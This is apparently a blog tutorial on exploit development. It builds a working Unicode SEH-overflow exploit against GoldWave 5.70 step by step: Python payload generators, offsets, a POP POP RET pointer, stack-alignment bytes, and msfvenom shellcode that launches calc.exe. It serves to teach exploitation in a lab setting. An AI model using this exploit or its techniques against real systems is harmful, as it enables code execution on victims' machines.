Evil Robot Club's homepage

Bookmark this to keep an eye on my project updates!

View My GitHub Profile

1 February 2024

Basics of Exploit Development 4: Unicode Overflows

by Andy

The Basics of Exploit Development 4: Unicode Overflows

Introduction

Hello, if you have read the other articles in this series welcome back, if not I would encourage you to read those before proceeding with this article as this article builds on concepts laid down in the previous installments. In this article we will be covering a technique similar to the one in the second installment of this series however with the twist of the character encoding of the input being in Unicode. In order to demonstrate how to get around this impediment we will be writing parts of the payload and doing some stack realignment manually.

Setup

This guide was written to run on a fresh install of Windows 10 Pro (either 32-bit or 64-bit should be fine) and as such you should follow along inside a Windows 10 virtual machine. This vulnerability has also been tested on Windows 7 however the offsets in this article are the ones from the Windows 10 machine and subsequently may differ on your Windows 7 installation. The steps to recreate the exploit however are exactly the same.

We will need a copy of X64dbg which you can download from the official website and a copy of the ERC plugin for X64dbg from here. If you already have a copy of X64dbg and the ERC plugin installed running “ERC –Update” will download and install the latest 32bit and 64 bit plugins for you. As the vulnerable application we will be working with is a 32-bit application you will need to either download the 32-bit version of the plugin binaries or compile the plugin manually. Instructions for installing the plugin can be found on the GitHub page.

If using Windows 7 and X64dbg with the plugin installed and it crashes and exits when starting you may need to install .Net Framework 4.7.2 which can be downloaded here.

Finally you will need a copy of the vulnerable application (Goldwave 5.70) which can be found here. In order to confirm everything is working, start X64dbg and select File -> Open, then navigate to where you installed Goldwave570.exe and select the executable. Click through the breakpoints and the Goldwave GUI interface should pop up. Now in X64dbg’s terminal type:

Command:

ERC --help

You should see the following output:

X64bgd open, running the ERC plugin and attached to Goldwave570.exe.

What is Unicode

Unicode is a character encoding scheme. We’ve got lots of languages with lots of characters that computers should ideally display. Unicode assigns each character a unique number, or code point.

Originally when 8 bit computers were the height of our capability ASCII was created to cover the dominant language in computing at the time which was English. ASCII mapped characters to numbers (originally at a maximum of 7 bits(127) but was later expanded to 8 bits to cover characters from other languages) and having 26 characters in the alphabet in both upper and lower case, numbers and punctuation this worked quite well for a time.

However over time the need arose to provide characters in all languages and this simply cannot be done with 255 bits. Thus more character encodings were needed.

Unicode provides a solution to this problem by using a variable number of bytes per character. There are multiple UTF (Unicode Transformation Format) encodings all of which work in a similar manner. You choose a unit size, which for UTF-8 is 8 bits, for UTF-16 is 16 bits (UTF-16 is what Windows defines as “Unicode”), and for UTF-32 is 32 bits. The standard then defines a few of these bits as flags: if they’re set, then the next unit in a sequence of units is to be considered part of the same character. If they’re not set, this unit represents one character fully. Thus the most common (English) characters only occupy one byte in UTF-8 (two in UTF-16, 4 in UTF-32), but other language characters can occupy six bytes or more.

As we now know that Unicode is a multibyte character encoding we need to know what to look for in our debugger. When we provide an input string of “AAAA…” it will no longer be shown as “41414141…” due to the fact that as mentioned above Windows predominantly uses UTF-16 as it’s Unicode standard meaning even basic English characters will be two bytes long.

ASCII:

A      -> 41    
ABC    -> 414243

Unicode:

A      -> 0041
ABC    -> 004100420043

These additional null bytes will obviously cause a problem as any address we wish to overwrite EIP or our SEH registers with will obviously need to contain null bytes. We do however have some tools to help with these hurdles however more on those later.

Confirming the Vulnerability Exists

This exploit begins with an SEH overwrite similar to the one covered in the second installment of this series. As such we will need to crash the program and confirm that the input we provided overwrites an SEH handler.

To begin we will use the following python code to generate our input:

f = open("crash-1.txt", "wb")  
  
buf = b""  
buf += b"\x41" * 5000  
  
f.write(buf)  
f.close() 

Run this and it will create a file, copy the contents of crash-1.txt to the clipboard. Open Goldwave app, select file then “Open URL” and paste the contents after http://. The application should crash and we should be able to see what our Unicode input string looks like in memory.

Unicode string in memory.

As we can see from the image above the input is being read into memory however one byte is being left as is and the other byte absorbs the two null bytes. This is due to the fact that a null byte is the start of the add byte ptr instruction and 0x41 (inc ecx) does not take any values as arguments. As such changing the values we put in the string can change how the instructions are interpreted in memory. Then navigating to the SEH tab you should see that the first handler has been overwritten with 00410041.

SEH handler overwritten with Unicode A’s.

Now that we have confirmed the vulnerability exists it is time to being developing a full exploit.

Developing the Exploit

So at the present moment we know that the application is vulnerable to an SEH overflow. Initially we should set up our environment so all our output files are generated in an easily accessible place.

Command:

ERC --Config SetWorkingDirectory <C:\Wherever\you\are\working\from>

Setting the working directory.

Now we should set an author so we know who is building the exploit.

Command:

ERC --Config SetAuthor <You>

Setting the author.

Now we must identify how far into our buffer the SEH overwrite occurs. For this we will execute the following command in order to generate a pattern using ERC:

Command:

ERC --pattern c 5000

Output of ERC --Pattern c 5000.

We can now add this into our exploit code either directly from the debugger or from the Pattern_Create_1.txt file in our working directory to give us exploit code that looks something like the following.

f = open("crash-2.txt", "wb")  
  
buf = b""  
buf += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac"  
buf += b"9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8"  
buf += b"Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7A"  
buf += b"i8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al"  
buf += b"7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6"  
buf += b"Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5A"  
buf += b"r6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au"  
buf += b"5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4"  
buf += b"Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3B"  
buf += b"a4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd"  
buf += b"3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2"  
buf += b"Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1B"  
buf += b"j2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm"  
buf += b"1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0"  
buf += b"Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9B"  
buf += b"s0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu"  
buf += b"9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8"  
buf += b"Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7C"  
buf += b"a8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd"  
buf += b"7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6"  
buf += b"Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5C"  
buf += b"j6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm"  
buf += b"5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4"  
buf += b"Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3C"  
buf += b"s4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv"  
buf += b"3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2"  
buf += b"Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1D"  
buf += b"b2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De"  
buf += b"1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0"  
buf += b"Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9D"  
buf += b"k0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm"  
buf += b"9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8"  
buf += b"Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7D"  
buf += b"s8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv"  
buf += b"7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6"  
buf += b"Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5E"  
buf += b"b6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee"  
buf += b"5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4"  
buf += b"Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3E"  
buf += b"k4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En"  
buf += b"3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2"  
buf += b"Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1E"  
buf += b"t2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew"  
buf += b"1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0"  
buf += b"Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9F"  
buf += b"c0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe"  
buf += b"9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8"  
buf += b"Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7F"  
buf += b"k8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn"  
buf += b"7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6"  
buf += b"Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5F"  
buf += b"t6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw"  
buf += b"5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4"  
buf += b"Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3G"  
buf += b"c4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf"  
buf += b"3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2"  
buf += b"Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"  
  
f.write(buf)  
f.close() 

With this if we now generate the crash-2.txt file and copy its contents into our vulnerable application we will encounter a crash. We can now run the FindNRP command in order to identify how far through our buffer the SEH record was overwritten.

Appended to the FindNRP command is the -Unicode switch. This switch specifies that the character encoding is UTF-16 (the Windows Unicode default) and only needs to be specified once per debugging session. As such all further commands will be in Unicode (where applicable) until the debugger is restarted.

Command:

ERC --FindNRP -Unicode

Output of ERC –FindNRP -Unicode.

The output of the FindNRP command above displays that the SEH register is overwritten after 1019 characters in the malicious payload. As such we will now ensure that our tool output is correct by overwriting our SEH register with B’s and C’s. Firstly we will need to hit the restart button in order to restart the process and prepare it for another malicious payload. The following exploit code should produce an overwrite of B’s and C’s over the SEH register.

f = open("crash-3.txt", "wb")  
  
buf = b""  
buf += b"\x41" * 1019  
buf += b"\x42" * 2  
buf += b"\x43" * 2  
buf += b"\x44" * (5000 - len(buf))  
  
f.write(buf)  
f.close()

SEH Overwrite.

As we can see the SEH register is overwritten with B’s and C’s as we expected it would be. Now in order to return us back to our exploit code we will need to find a POP, POP, RET instruction. For a full run down of how an SEH overflow works read the previous article in this series. In order to find a suitable pointer to a POP, POP, RET instruction set we will run the following command. As the character encoding is set as Unicode only Unicode compatible results will be returned.

Command:

ERC --SEH -ASLR -SafeSEH -Rebase -OSDLL -NXCompat

Output of the ERC --SEH command.

As we can see we have a number of options to choose from for POP, POP, RET instructions. Normally when carrying out a SEH overflow we would execute a POP, POP, RET instruction set and then jump over them, however with Unicode this is not possible due to the additional null bytes we must deal with. Therefore the address of the POP, POP, RET instruction must not cause the program to crash as we will need to step through it after executing the POP, POP, RET instructions.

As such it was decided to go with 004800b3 we can walk through these instructions without crashing the application. At this point our exploit code should now look something like this:

f = open("crash-4.txt", "wb")  
  
buf = b""  
buf += b"\x41" * 1021                          #Added 2 bytes to cover nSeh. We will replace these later with Unicode NOPs
buf += b"\xB3\x48"                             #0x004800b3 | pop ecx, pop ebp, ret  
buf += b"\x44" * (5000 - len(buf))  
  
f.write(buf)  
f.close()  

We should now test our code and confirm that the POP, POP, RET does work and that we land where we expect to. To do this place a breakpoint at the address of our POP, POP, RET instruction set.

Landing at POP, POP, RET.

As we can see we do land at our POP, POP, RET instruction set and this will return us to our SEH overwrite which we can step through and this will land us in our payload. Normally this would be our mission complete however Unicode payloads are slightly more complex than a normal payload and some additional steps are required.

Aligning the Stack and Positioning our Payload

Under normal circumstances a payload generated by MSFVenom or a similar tool will have a getPC (Program Counter) routine however there is no standard routine for Unicode Overflows. We can manually emulate this code by aligning one of our CPU registers to the address where our shell code begins.

In order to achieve this were going to need to create a Unicode NOP since 0x90 will not work as the null bytes will crash the application. We need an instruction that combined with a null byte or two will not crash the application. For that purpose we will use 0x71 and 0x75.

0x75 - Combined with a null byte before and after produces a add byte ptr ds:[EBP], al instruction. This does not cause a crash as we can see from our registers EBP points into the address space of our application.

0x71 – combined with a single trailing null byte produces a JNO (jump if overflow) instruction. This will only execute if the overflag flag (OF) is set and as such never activates during this exploit.

So now we will need to input these values between the instructions that we want to execute. We will use 0x75 between specific instructions and 0x71 as a NOP sled. Now all we need to do is align a register to the start of our payload and we have finished our exploit.

Note: A Unicode NOP sled does not technically need a separate instruction, it could simply be achieved using a combination of 0x75 and 0x90 however I have added in 0x71 to demonstrate a second way of generating a Unicode NOP.

To do so we will push the value of ESP onto the stack and then pop that value into EAX. Then add and subtract from EAX in order to get the value exactly where we want it. The final stack alignment instructions should look something like the following:

#realigning stack  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x54"                      # Push ESP  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x58"                      # POP EAX  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x05\xFF\x10"              # ADD EAX,  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x2d\xEA\x10"              # SUB EAX,  
buf += b"\x75"                      # Unicode NOP  

Which when read into memory will grab our unwanted null bytes and attach them all to the appropriate 0x75 bytes so they do not get in the way of what we are trying to do.

Stack alignment instructions in memory.

As we can see our 0x004800B3 pointer has converted into harmless instructions and our Unicode NOPs have absorbed the unwanted null bytes. We then add 0x1000FF00 to EAX and subtract 0x1000EA00 from it in order to leave EAX with the value of 0x0019E664 or 1190 bytes past the current location of EIP.

This is where our second Unicode NOP comes into play. We will now fill the space between EIP and the address of our final payload with the second NOP (0x71). Remember there is a null byte added with each character we inject so we only need half the number of characters as there are bytes between EIP and EAX.

f = open("crash-5.txt", "wb")  
  
buf = b""  
buf += b"\x41" * 1019  
buf += b"\x71\x71"                  # Unicode NOP  
buf += b"\xB3\x48"                  # 0x004800b3 | pop ecx, pop ebp, ret  
  
#realigning stack  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x54"                      # Push ESP  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x58"                      # POP EAX  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x05\xFF\x10"              # ADD EAX,  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x2d\xEA\x10"              # SUB EAX,  
buf += b"\x75"                      # Unicode NOP  
  
buf += b"\x71" * 595  
	  
buf += b"\x44" * (5000 - len(buf))  
	  
f.write(buf)  
f.close()

Finally all we have to do is create a payload and add it to our shell code and this should be completed.

Finishing the Exploit

In order to create our payload we will be once again using MSFVenom. So boot up an instance of Kali or wherever you keep a copy of MSFVenom and run the following command to generate our payload.

Command:

msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegiseter=EAX -f python

MSFVenom payload generation.

After we copy this into our exploit code it should look something like the following:

f = open("crash-6.txt", "wb")  
  
buf = b""  
buf += b"\x41" * 1019  
buf += b"\x71\x71"                  # Unicode NOP  
buf += b"\xB3\x48"                  # 0x004800b3 | pop ecx, pop ebp, ret  
  
#realigning stack  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x54"                      # Push ESP  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x58"                      # POP EAX  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x05\xFF\x10"              # ADD EAX,  
buf += b"\x75"                      # Unicode NOP  
buf += b"\x2d\xEA\x10"              # SUB EAX,  
buf += b"\x75"                      # Unicode NOP  
  
buf += b"\x71" * 595  
  
#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX -f python  
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"  
buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"  
buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"  
buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"  
buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"  
buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"  
buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"  
buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"  
buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"  
buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"  
buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50"  
buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50"  
buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"  
buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50"  
buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51"  
buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"  
buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47"  
buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54"  
buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51"  
buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a"  
buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49"  
buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b"  
buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37"  
buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c"  
buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58"  
buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34"  
buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51"  
buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35"  
buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31"  
buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31"  
buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d"  
buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d"  
buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f"  
buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45"  
buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d"  
buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43"  
buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47"  
buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b"  
buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e"  
buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41"  
  
buf += b"\x44" * (5000 - len(buf))  
	  
f.write(buf)  
f.close()  

Now all we have to do is run the code, copy the contents of crash-6.txt to our copy buffer and inject them into our application and watch calc.exe pop up for us.

Completed exploit.

Conclusion

For a substantial amount of time it was believed that Unicode overflows were not exploitable and that they could only be used to cause a denial of service condition however in 2002 Chris Anley published a paper demonstrating this to be false. If you wish for some further reading on this topic I would suggest reading Building IA32 ‘Unicode-Proof’ Shellcodes paper published in Phrack in 2003.

tags: Windows - Exploit-Development